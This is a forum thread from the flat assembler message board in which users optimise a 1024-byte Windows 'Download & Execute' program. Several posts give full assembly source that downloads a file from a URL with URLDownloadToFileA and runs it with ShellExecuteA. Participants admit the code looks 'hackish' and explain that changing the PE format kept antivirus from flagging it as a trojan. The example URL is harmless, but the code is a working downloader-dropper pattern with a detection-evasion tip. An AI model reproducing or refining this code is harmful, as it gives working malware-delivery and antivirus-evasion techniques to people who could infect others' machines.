flat assembler
Message board for the users of flat assembler.
Index
> Windows > Download & Exec. (1024b)... Help to optimize. |
Author |
|
LocoDelAssembly 24 Jul 2007, 22:13
By a simple change I got a 1024 bytes executable but I need permission of a moderator to post
|
|||
24 Jul 2007, 22:13 |
|
sylwek32 24 Jul 2007, 22:16
why do you need additional permission?
if you have got some technical problems maybe you can send it via pm.. |
|||
24 Jul 2007, 22:16 |
|
LocoDelAssembly 25 Jul 2007, 00:21
Because the code looks like for hackish purposes.
Well, I PMed the minor modification now... |
|||
25 Jul 2007, 00:21 |
|
Yardman 25 Jul 2007, 01:41
[ Post removed by author. ]
Last edited by Yardman on 04 Apr 2012, 02:31; edited 1 time in total |
|||
25 Jul 2007, 01:41 |
|
LocoDelAssembly 25 Jul 2007, 02:04
I mean the possible utilization of this tiny program, not the way I stripped those 512
I did more or less the same as you Yardman. The only difference is that in the data import block I've just imported GetProcAddressA and LoadLibraryA, the rest of the original code remained intact. |
|||
25 Jul 2007, 02:04 |
|
Yardman 25 Jul 2007, 02:29
[ Post removed by author. ]
Last edited by Yardman on 17 Jan 2012, 17:58; edited 1 time in total |
|||
25 Jul 2007, 02:29 |
|
kohlrak 25 Jul 2007, 04:21
I wish i knew more about the server on it. It appears that it's not a standard HTTP server, and i have my own purpose for it... My idea could be considered a hack depending on opinion, but i don't want to mention the potential for since this is posted, it would be bad if some one saw it.
|
|||
25 Jul 2007, 04:21 |
|
sylwek32 25 Jul 2007, 06:38
Thanks..
And yes my code looked like for hacking purposes... But I planned to use it only at home. I don't know why but if I change "format pe" to "format pe gui" my AntiVirus Software (FreeAV) shows it's a trojan horse. LocoDelAssembly: As I start your version it shows there is no procedure like GetProcessAddressA in kernel32.dll |
|||
25 Jul 2007, 06:38 |
|
vador 25 Jul 2007, 08:37
GetProcessAddressA ==> GetProcAddressA
|
|||
25 Jul 2007, 08:37 |
|
sylwek32 25 Jul 2007, 08:48
Thats what I meant.. Sorry..
It shows there is no procedure in kernel32.dll like GetProcAddressA |
|||
25 Jul 2007, 08:48 |
|
sylwek32 26 Jul 2007, 21:19
I have made some modifications..
Would be great if you would help to optimize:wink: Code: ;*************************************************** ;* 1024-Bytes Download & Execute * ;*************************************************** format pe ; For some reason executable with format pe ; gui was identified as a trojan horse by ; AntiVir Guard. Format PE seems to fix that. include 'E:\FASM\fasmw167\INCLUDE\win32ax.inc' main: macro loadapi api,lib { invoke LoadLibrary,lib invoke GetProcAddress,eax,`api mov [_#api],eax jmp @f _#api dd 0 @@: } loadapi URLDownloadToFileA,'urlmon.dll' loadapi kernel32, 'kernel32.dll' loadapi ShellExecuteA,'shell32.dll' loadapi ExitProcess,'kernel32.dll' ; invoke _URLDownloadToFileA,0,flname ,localf,0,0 push 0 push 0 push strLocalfile push strURL push 0 call [_URLDownloadToFileA] ; invoke _ShellExecuteA, 0, optrd, localf, 0,0,SW_SHOW push SW_SHOW push 0 push 0 push strLocalfile push strFunction push 0 call [_ShellExecuteA] ; invoke _ExitProcess,0 push 0 call [_ExitProcess] ret strURL db 'http://flatassembler.net/fasmw167.zip',0 strLocalfile db 'c:\fasm.zip',0 strFunction db 'open',0 align 4 data import library kernel,'KERNEL32.DLL' import kernel,\ LoadLibrary,'LoadLibraryA',\ GetProcAddress,'GetProcAddress' end data ;eof |
|||
26 Jul 2007, 21:19 |
|
asmfan 27 Jul 2007, 07:08
call not addresses but registers
mov esi,LoadLibrary call [esi] call [esi - LoadLibrary + GetProcAddress] ;call GetProcAddress etc. It woul be cheaper to make one import table merged to code without searching addresses at all. replace ExitProcess with ret. Replace absolute addressing to inc files with relative (to %fasminc%). Don't use ['open',0] cuz ShellExecute ran with 0 as a parameter treats it as 'open'. |
|||
27 Jul 2007, 07:08 |
|
sylwek32 28 Jul 2007, 17:38
thanks
|
|||
28 Jul 2007, 17:38 |
|
sylwek32 29 Jul 2007, 10:51
Some cleaned version:
Code: ;*************************************************** ;* 1024-Bytes Download & Execute * ;*************************************************** format pe ; For some reason executable with format pe ; gui was identified as a trojan horse by ; AntiVir Guard. Format PE seems to fix that. include '%fasminc%\win32ax.inc' main: ;Imports moved ; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0 push 0 push 0 push strLocalfile push strURL push 0 call [URLDownloadToFileA] ; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW push SW_SHOW push 0 push 0 push strLocalfile push 0 ;0 is open push 0 call [ShellExecuteA] ; invoke _ExitProcess,0 push 0 call [ExitProcess] ret strURL db 'http://flatassembler.net/fasmw167.zip',0 strLocalfile db 'c:\fasm.zip',0 align 4 data import library kernel, 'KERNEL32.DLL',\ shell32, 'SHELL32.DLL',\ urlmon, 'URLMON.DLL',\ user32, 'USER32.DLL' import kernel,\ LoadLibrary, 'LoadLibraryA',\ GetProcAddress, 'GetProcAddressA',\ ExitProcess, 'ExitProcess' import shell32,\ ShellExecuteA, 'ShellExecuteA' import urlmon,\ URLDownloadToFileA,'URLDownloadToFileA' end data ;eof |
|||
29 Jul 2007, 10:51 |
|
sylwek32 31 Jul 2007, 14:54
New version.
Suggestions are welcome! Thanks for them. Code: ;*************************************************** ;* 1024-Bytes Download & Execute rev. 20 * ;*************************************************** format pe ; For some reason executable with format pe ; gui was identified as a trojan horse by ; AntiVir Guard. Format PE seems to fix that. include '%fasminc%\win32ax.inc' main: ;Imports moved ; Download strURL to strLocalfile ; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0 xor eax,eax push eax push eax push strLocalfile push strURL push eax mov esi,LoadLibrary call DWORD [esi - LoadLibrary + URLDownloadToFileA] ;URLDownloadToFileA ; Execute Downloaded strLocalfile ; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW push SW_SHOW push eax push eax push strLocalfile push eax ;eax=0 and 0 is open push eax call DWORD [esi - LoadLibrary + ShellExecuteA] ;ShellExecuteA ; Exit Process push eax call DWORD [esi - LoadLibrary + ExitProcess] ;ExitProcess call DWORD [esi - LoadLibrary + ExitThread] ;ExitThread ret strURL db 'http://flatassembler.net/fasmw167.zip',0 strLocalfile db 'c:\fasmw167.zip',0 align 4 data import library kernel, 'KERNEL32.DLL',\ shell32, 'SHELL32.DLL',\ urlmon, 'URLMON.DLL',\ user32, 'USER32.DLL' import kernel,\ LoadLibrary, 'LoadLibraryA',\ GetProcAddress, 'GetProcAddressA',\ ExitProcess, 'ExitProcess',\ ExitThread, 'ExitThread' import shell32,\ ShellExecuteA, 'ShellExecuteA' import urlmon,\ URLDownloadToFileA,'URLDownloadToFileA' end data ;eof |
|||
31 Jul 2007, 14:54 |
|
< Last Thread | Next Thread > |
Forum Rules:
|
Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.
Website powered by rwasa.